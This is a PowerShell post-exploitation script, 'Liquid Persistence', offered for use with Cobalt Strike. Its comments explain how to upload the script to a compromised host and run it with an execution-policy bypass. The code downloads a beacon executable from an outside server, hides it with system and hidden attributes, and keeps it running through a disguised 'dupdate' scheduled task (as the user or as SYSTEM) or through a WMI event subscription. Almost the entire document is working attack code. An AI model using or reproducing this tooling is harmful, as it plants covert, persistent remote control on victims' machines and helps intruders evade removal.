Liquid Persistence
Posted: 01-28-2025
Language: Powershell
param (
[string]$mode
)
# Liquid Persistence
# Author: Trigat
# This works well with Cobalt Strike and other beacons.
# Create and host a beacon name such as dupdate.exe.
# Within Cobalt Strike, navigate to Site Management > Host File.
# Host with domain name or IP: http://domain.com:80/dupdate.exe
# Use Cobalt Strike to upload the script.
# beacon> upload C:\liquid.ps1
# Execute with one of the following arguments:
# task = Schedule task as non-elevated user
# tasksystem = Schedule task as System user
# taskrun = Run scheduled task immediately
# taskclean = Remove scheduled task
# wmi = WMI Event Subscription as System user
# wmiclean = Remove WMI Event Subscription
# Example Cobalt Strike command with argument:
# beacon> shell powershell -ExecutionPolicy Bypass -File "C:\liquid.ps1" wmi -Verb RunAs
# Example PowerShell command with argument:
# .\liquid.ps1 wmi
#### UPDATE BEACON PATH AND NAME ####
$bPath = "https://trigat.com:443/beacon.exe"
$bName = "beacon.exe"
switch ($mode) {
"task" {
# Command to run as Non-Administrator
$dPath = "c:\users\public\$bName"; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile($bPath, $dPath)
attrib +s +h $dPath
$UserName = [System.Environment]::UserName
$DUP = 'dupdate'; $HM = "-Command `"if (!(Get-Process -Name $DUP -ErrorAction SilentlyContinue)) { Start-Process '$dPath' }`""; $N = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $HM; $TR = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3); $S = New-ScheduledTaskSettingsSet; $ST = New-ScheduledTask -Action $N -Trigger $TR -Settings $S; Register-ScheduledTask dupdate -InputObject $ST;
}
"tasksystem" {
# Command to run as Administrator
$dPath = "C:\Windows\ServiceProfiles\NetworkService\AppData\Local\$bName"; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile($bPath, $dPath)
attrib +s +h $dPath
$DUP = 'dupdate'; $HM = "-Command `"if (!(Get-Process -Name $DUP -ErrorAction SilentlyContinue)) { Start-Process '$dPath' }`""; $U = "NT AUTHORITY\SYSTEM"; $R = "Highest"; $SA = "ServiceAccount"; $P = New-ScheduledTaskPrincipal -UserID $U -LogonType $SA -RunLevel $R; $N = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $HM; $TR = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 2); $S = New-ScheduledTaskSettingsSet; $ST = New-ScheduledTask -Action $N -Trigger $TR -Settings $S -Principal $P; Register-ScheduledTask dupdate -InputObject $ST;
}
"taskrun" {
# Run scheduled task
$DU = "dupdate"; $BN = Start-ScheduledTask -TaskName $DU; $BN
}
"taskclean" {
# Remove Task
unregister-ScheduledTask -TaskName "dupdate" -Confirm:$false
$dPath1 = "c:\users\public\$bName"
$dPath2 = "C:\Windows\ServiceProfiles\NetworkService\AppData\Local\$bName"
# Function to remove attributes and delete file
function Remove-File {
param (
[string]$filePath
)
if (Test-Path $filePath) {
# Remove hidden and system attributes
attrib -s -h $filePath
# Delete the file
Remove-Item $filePath -Force
Write-Host "Deleted: $filePath"
}
else {
Write-Host "File not found: $filePath"
}
}
# Check both paths
Remove-File -filePath $dPath1
Remove-File -filePath $dPath2
}
"wmi" {
# WMI Event Subscription
$dPath = "C:\Windows\ServiceProfiles\NetworkService\AppData\Local\$bName"; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile($bPath, $dPath)
attrib +s +h $dPath
$FilterArgs = @{name='dupdate'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; $Filter = New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs; $ConsumerArgs = @{name='dupdate'; CommandLineTemplate="$dPath";}; $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs; $FilterToConsumerArgs = @{Filter = [Ref] $Filter; Consumer = [Ref] $Consumer}; $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
}
"wmiclean" {
# Remove WMI Event Subscription
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'dupdate'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'dupdate'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
$dPath = "C:\Windows\ServiceProfiles\NetworkService\AppData\Local\$bName";
# Function to remove attributes and delete file
function Remove-File {
param (
[string]$filePath
)
if (Test-Path $filePath) {
# Remove hidden and system attributes
attrib -s -h $filePath
# Delete the file
Remove-Item $filePath -Force
Write-Host "Deleted: $filePath"
}
else {
Write-Host "File not found: $filePath"
}
}
# Check both paths
Remove-File -filePath $dPath
}
default {
Write-Host "Invalid mode specified. Use 'task', 'tasksystem', 'taskrun', 'taskclean', 'wmi', or 'wmiclean'"
exit 1
}
}